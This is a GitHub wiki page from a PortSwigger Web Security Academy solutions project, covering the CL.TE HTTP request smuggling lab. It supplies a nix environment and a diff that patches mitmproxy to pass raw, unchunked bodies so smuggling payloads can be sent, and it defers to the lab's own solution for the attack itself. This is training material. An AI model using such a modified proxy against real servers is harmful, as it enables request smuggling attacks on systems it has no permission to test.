HTTP request smuggling - gachikuku/portswigger GitHub Wiki

Practitioner lab:
HTTP request smuggling, basic CL.TE vulnerability

  • Temporary solution (hopefully *sigh*)

    See discusion

  • Detailed approach

    1. Using nix make a nix development environment 
      { pkgs ? import <nixpkgs> {} }:
  pkgs.mkShell {
    # nativeBuildInputs is usually what you want -- tools you need to run
    nativeBuildInputs = with pkgs.buildPackages; [ python312Full python312Packages.pip git ];
}
      Save file as shell.nix and run the command nix-shell shell.nix.
    2. Follow the CONTRIBUTING.md found in mitmproxy.
    3. Make the following changes to this path mitmproxy/blob/main/mitmproxy/proxy/layers/http/_http1.py 
      --- _http1.py             2025-01-12 00:26:39
+++ modified_http1.py     2025-01-12 00:27:13
@@ -247,10 +247,10 @@
             yield commands.SendData(self.conn, raw)
         elif isinstance(event, ResponseData):
             assert self.response
-            if "chunked" in self.response.headers.get("transfer-encoding", "").lower():
-                raw = b"%x\r\n%s\r\n" % (len(event.data), event.data)
-            else:
-                raw = event.data
+            #if "chunked" in self.response.headers.get("transfer-encoding", "").lower():
+                #raw = b"%x\r\n%s\r\n" % (len(event.data), event.data)
+
+            raw = event.data
             if raw:
                 yield commands.SendData(self.conn, raw)
         elif isinstance(event, ResponseEndOfMessage):
@@ -261,7 +261,7 @@
                 and "chunked"
                 in self.response.headers.get("transfer-encoding", "").lower()
             ):
-                yield commands.SendData(self.conn, b"0\r\n\r\n")
+                yield commands.SendData(self.conn, b"")
             yield from self.mark_done(response=True)
         elif isinstance(event, ResponseProtocolError):
             if not (self.conn.state & ConnectionState.CAN_WRITE):
@@ -372,16 +372,15 @@
             yield commands.SendData(self.conn, raw)
         elif isinstance(event, RequestData):
             assert self.request
-            if "chunked" in self.request.headers.get("transfer-encoding", "").lower():
-                raw = b"%x\r\n%s\r\n" % (len(event.data), event.data)
-            else:
-                raw = event.data
+            #if "chunked" in self.request.headers.get("transfer-encoding", "").lower():
+                #raw = b"%x\r\n%s\r\n" % (len(event.data), event.data)
+            raw = event.data
             if raw:
                 yield commands.SendData(self.conn, raw)
         elif isinstance(event, RequestEndOfMessage):
             assert self.request
             if "chunked" in self.request.headers.get("transfer-encoding", "").lower():
-                yield commands.SendData(self.conn, b"0\r\n\r\n")
+                yield commands.SendData(self.conn, b"")
             elif http1.expected_http_body_size(self.request, self.response) == -1:
                 yield commands.CloseTcpConnection(self.conn, half_close=True)
             yield from self.mark_done(request=True)
    4. Follow the lab's solution.

Solutions for the Portswigger's Web Security Academy using mitmproxy and other cli tools instead of Burp Suite

⚠️ **GitHub.com Fallback** ⚠️